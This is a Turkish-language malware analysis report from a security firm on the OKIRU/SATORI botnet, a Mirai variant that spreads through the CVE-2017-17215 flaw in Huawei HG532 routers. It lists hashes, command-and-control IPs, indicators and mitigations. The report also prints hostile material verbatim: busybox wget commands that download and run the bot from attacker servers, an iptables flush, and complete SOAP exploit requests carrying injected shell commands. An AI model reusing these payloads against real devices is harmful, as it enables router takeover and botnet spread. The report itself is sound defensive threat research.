OKIRU/SATORI BOTU İNCELEMESİ - Siber Güvenlik Teknolojileri...siber güvenlik alanında faaliyet...
Transcript of OKIRU/SATORI BOTU İNCELEMESİ - Siber Güvenlik Teknolojileri...siber güvenlik alanında faaliyet...
BilgeSGT BilgeSOMEBilgeSGT,teknolojientegrasyonuve
sibergüvenlikalanındafaaliyet
göstermektedir.
Özelliklekamukurumları,finans
kuruluşlarıvekritikaltyapılara
yönelikhizmetlervermekteolanBilge
SGT,kurumlarınözelihtiyaçları
doğrultusundauçtanucateknoloji
çözümlerisunmaktadır.
Ağteknolojileri,sunucuvesistem
çözümleri,güvenliveridepolama
sistemleri,iletişimşifreleme,ağ
trafiğioptimizasyonuçözümleri
sunabilenBilgeSGT,mevcut
çözümleriözelleştirerekkurumların
verimliliğiniveyönetimkabiliyetlerini
arttırmayıhedeflemektedir.
BilgeSOME,kurumlarınsiber
güvenlikolaylarıanındaihtiyaç
duyduklarıgüveniliruzmandesteğini
sağlamakiçinBilgeSGTtarafından
kurulmuşsibergüvenlikekibidir.
Sistemleriniz,iletişimaltyapınız,
uygulamalarınızsaldırıaltında
olduğunda,bilgilerinizinsızdırılıp
ifşaaedilmeriskiilekarşılaştığınızda;
BilgeSOMEacilmüdahaleekibiyle
sizedestekolmakvekurumunuzu
sibersaldırılarakarşıhazırlamak
altyapınızıiyileştirir,teknik
ekiplerinizieğitir.
Bilge SGT Sayfa 3 / 12
RAPOR HAKKINDA 30 Kasım 2017 tarihinde Huawei HG532 model yönlendirici modem cihazlarında
keşfedilen güvenlik zafiyeti, teknik detayları paylaşılmamasına rağmen saldırı amaçlı
kullanılmaya başlanmıştır. Raporda incelenen OKIRU/SATORI Bot’u, 2016 yılı
sonunda yayılmaya başlayan ve dünya genelinde birçok cihazı etkileyerek çok kuvvetli
DDoS saldırılarına sebep olan Mirai Bot’u temel alınarak geliştirilmiştir. Mirai botunda değişiklik yapılarak, Huawei cihazlardaki bu güvenlik açığını kullanıp zararlı yazılımın
yayılmasını sağlayacak hale getirilmiş, yayılırken kullandığı dosya adı olan “okiru”’dan yola çıkılarak ismi OKIRU/SATORI olarak tanımlanmıştır.
Zararlı yazılımın kısa süre içerisinde Amerika Birleşik Devletleri, Orta ve Güney
Amerika ülkeler, Kuzey Afrika ülkeleri, Japonya, Orta Avrupa ve Türkiye’de etkili olduğu gözlemlenmiştir.
OKIRU/SATORI’nin atası olan Mirai Bot ağı kullanılarak çeşitli web sitelerine saldırılar
gerçekleştirilmişti. İnternetin en büyük DNS hizmet sağlayıcılarından birisi olan DYN şirketine gerçekleştirilen saldırı Twitter, Spotify, Reddit, Paypal, Netflix gibi küresel
bilinirliği olan hizmet ve içerik sağlayıcıların servislerini 2016 yılı sonu ve 2017 yılı başlarında kesintiye uğratmıştı.
Analiz çalışmamızda OKIRU/SATORI Botunun binary dosyası üzerinden hızlı inceleme
yaparak nasıl çalıştığı, nasıl yayıldığı ve ne tedbir alınması gerektiğini anlamaya yönelik teknik bir değerlendirme sunulmaktadır.
Bilge SGT Sayfa 4 / 12
OKIRU/SATORI BOT NEDİR, NASIL YAYILIR
OKIRU/SATORI solucanu, internete bağlı cihazları ve modemleri hedef alan Mirai
Botunun varyantıdır. Zarrlı yazılım, baz aldığı Mirai’nin kullandığı basit kullanıcı
adı/parola ikilileri yerine Huawei HG532 model yönlendirici modem aygıtlarında yakın
zamanda tespit edilmiş olan CVE-2017-17215 kimlik numaralı güvenlik zafiyetini
kullanarak enfekte olmakta ve yayılmaktadır.
Zararlı yazılım yayılmak için Huawei HG532 model yönlendirici modem aygıtların TR-064 protokolü implementasyonundaki yazılım hatasını kullanmaktadır. TCP/37215 ve
TCP/52869 portunda hizmet veren UPnP (Universal Plag and Play) servisinin girdi doğrulamaları eksik veya hatalı yapması sonucu, komut (Shell) satırında çalıştırılabilen
özel karakterler olan “ $( ) “ karakterleri isteklere enjekte edilebilmekte ve böylelikle
cihazların komut satırında yönetici yetkileri ile komut çalıştırılabilmektedir. Komut
satırında yapılacak işlemler, gerçekleştirilen istek içerisindeki NewStatusURL ve
NewDownloadURL direktiflerinin içerisine enjekte edilmektedir. Bu sayede saldırgan
sadece Mirati/Satori botunun URL’ini hedef sisteme vererek botun cihaz tarafından
indirilerek çalıştırılmasını sağlayabilmektedir.
Enjekte ederek komut satırında busybox içerisinde çalıştırdığı komut şu şekildedir;
busyboxwget-g172.93.97.219-l/tmp/rsh-r/okiru.mips;chmod+x
/tmp/rsh;/tmp/rsh
Bilge SGT Sayfa 5 / 12
TEKNİK DETAYLAR Zararlı yazılımın farklı platformlara yayılmak için kullandığı binary dosyaların adları ve hash değerleri;
HashDeğeri
BinaryAdı
df9c48e8bc7e7371b4744a2ef8b83ddf b
a7922bce9bb0cf58f305d17ccbc78d98 okiru.mipsel
37b7c9831334de97c762dff7a1ba7b3f okiru.arm7
e1411cc1726afe6fb8d09099c5fb2fa6 okiru.x86
cd4de0ae80a6f11bca8bec7b590e5832 okiru.x86
7de55e697cd7e136dbb82b0713a01710 okiru.mips
797458f9cee3d50e8f651eabc6ba6031 okiru.m68k
353d36ad621e350f6fce7a48e598662b okiru.arm
8db073743319c8fca5d4596a7a8f9931 okiru.sparc
0a8efeb4cb15c5b599e0d4fb9faba37d okiru.powerpc
08d48000a47af6f173eba6bb16265670 okiru.x86_64
e9038f7f9c957a4e1c6fc8489994add4 okiru.superh
Zararlı yazılımın komuta kontrolü için kullanılan sunucuların IP adresli listesi
C&CIPAdresleri
95.211.123.69(GüncelSunucu)
77.73.69.177
172.93.97.219
165.227.220.202
198.7.59.177
Bilge SGT Sayfa 6 / 12
Zararlı yazılımın binary dosyası incelendiğinde enfekte olduktan sonra cihaz
üzerindeki güvenlik duvarı kurallarını kaldırmaktadır;
iptables-F
Yine incelemede enfekte olduğu sisteme uygun binary dosyanın wget ile indirildiğini
ve indirme yerindeki tam dizini tespit etmek mümkündür;
/bin/busyboxwgethttp://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s-O->%s;/bin/busyboxchmod777%s;./%s;>%s
OKIRU/SATORI’nin diğer aygıtlara yayılmak için cihazlara gönderdiği HTTP isteklerinin detayları şu şekildedir;
POST/picdesc.xmlHTTP/1.1
Host:%s:52869
Content-Length:603
Accept-Encoding:gzip,deflate
SOAPAction:urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept:*/*
User-Agent:Hello-World
Connection:keep-alive
Bilge SGT Sayfa 7 / 12
<?xmlversion="1.0"?><s:Envelope
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMa
ppingxmlns:u="urn:schemas-upnp-
org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalP
ort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>443
82</NewInternalPort><NewInternalClient>`cd/var/;cp$SHELL
c;>c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription
>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><
/u:AddPortMapping></s:Body></s:Envelope>
POST/picdesc.xmlHTTP/1.1
Host:%s:52869
Content-Length:630
Accept-Encoding:gzip,deflate
SOAPAction:urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept:*/*
User-Agent:Hello-World
Connection:keep-alive
<?xmlversion="1.0"?><s:Envelope
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMa
ppingxmlns:u="urn:schemas-upnp-
org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalP
ort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>443
82</NewInternalPort><NewInternalClient>`cd/var/;wgethttp://%d.%d.%d.%d/rt.mips-
O->c`
</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>sync
thing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:Ad
dPortMapping></s:Body></s:Envelope>
Bilge SGT Sayfa 8 / 12
POST/picdesc.xmlHTTP/1.1
Host:%s:52869
Content-Length:602
Accept-Encoding:gzip,deflate
SOAPAction:urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept:*/*
User-Agent:Hello-World
Connection:keep-alive
<?xmlversion="1.0"?><s:Envelope
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMa
ppingxmlns:u="urn:schemas-upnp-
org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalP
ort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>443
82</NewInternalPort><NewInternalClient>`cd/var;chmod+x
c;./c`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription
>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><
/u:AddPortMapping></s:Body></s:Envelope>
POST/ctrlt/DeviceUpgrade_1HTTP/1.1
Host:%s:37215
User-Agent:Hello-World
Content-Length:430
Connection:keep-alive
Accept:*/*
Accept-Encoding:gzip,deflate
Bilge SGT Sayfa 9 / 12
Authorization:Digestusername="dslf-config",realm="HuaweiHomeGateway",
nonce="88645cefb1f9ede0e336e3569d75ee30",uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42db38f48f59d2a3597e19c",algorithm="MD5",qop="auth",
nc=00000001,cnonce="248d1a2560100669"
<?xmlversion="1.0"?>
<s:Envelopexmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgradexmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(/bin/busyboxwget-g%d.%d.%d.%d-l/tmp/.f-r/b;sh
/tmp/.f)</NewStatusURL>
<NewDownloadURL>$(echoHUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
İndikatör olarak kullanılabilecek veriler şu şekildedir;
• İsteklerin hedef portu TCP/52869 veya TCP/37215
• İstekler HTTP protokolü üzerinden ve SSL kullanılmadan SOAP istekleridir
• Isteklerin hedef dosyası /picdesc.xml veya /ctrlt/DeviceUpgrade_1
• İsteklerin User-Agent değeri “Hello-World”
• İstek gövdesinde (request body) busybox wget veya chmod veya $SHELL
dizileri bulunması
Enfekte olan cihazlar komuta kontrol sunucusuna TCP/7645 portuna bağlanmaya
çalışmaktadır. Dinamik analiz sistemlerini ve kum havuzlarını yanıltmak amacıyla
ortam kontrollerini yaptıktan sonra “109.206.187.130:23” adresine bağlantı isteği
gönderiyor gibi davranmaktadır.
Bilge SGT Sayfa 10 / 12
SALDIRGAN HAKKINDA BİLGİ Saldırı gelmişmiş bir güvenlik zafiyeti tekniği kullanıyor olsa da, saldırganın internet
üzerindeki güvenlik forumlarında “Mirai Botu’nu nasıl modifiye edebileceğini” soran
“Nexus Zeta” takma ismini kullanan amatör bir korsan olduğu tespit edilmiştir.
Resim1–HackForums’daARMv6bDerleyiciSorusu
Resim2-"nexus_zeta"TwitterHesabı
Resim3-"NexusZeta"GitHubHesabı
Bilge SGT Sayfa 11 / 12
NASIL TEDBİR ALIRIM?
• Ağınıza doğru trafiklerde TCP/52869 ve TCP/37215 portlarına yönelik istekleri
engelleyin.
• Ağınızdan dışarıya doğru komuta kontrol sunucusu listesinde verilen IP
adreslerine doğru trafikleri engelleyin.
• Huawei HG532 model yönlendirici modem kullanıyorsanız üreticinizin
yamalarını ve güncel firmware sürümünü modeminize yükleyin.
• Huawei HG532 model yönlendirici modem kullanıyorsanız cihaz üzerindeki
güvenlik duvarından dışarıdan gelen TCP/52869 ve TCP/37215 portlarına
yönelik istekleri engelleyin.
• Uzaktan yönetim arabirimlerini WAN ara yüzlerinden erişime mutlaka kapatın.
Bilge SGT Sayfa 12 / 12
Kurumsal Siber Olaylara Müdahale Ekipleri (SOME) eğitimi ve siber güvenlik
operasyon merkezi çalışmalarımız hakkında bilgi almak için bizlerle irtibata
geçebilirsiniz.
+90 (312) 240 32 36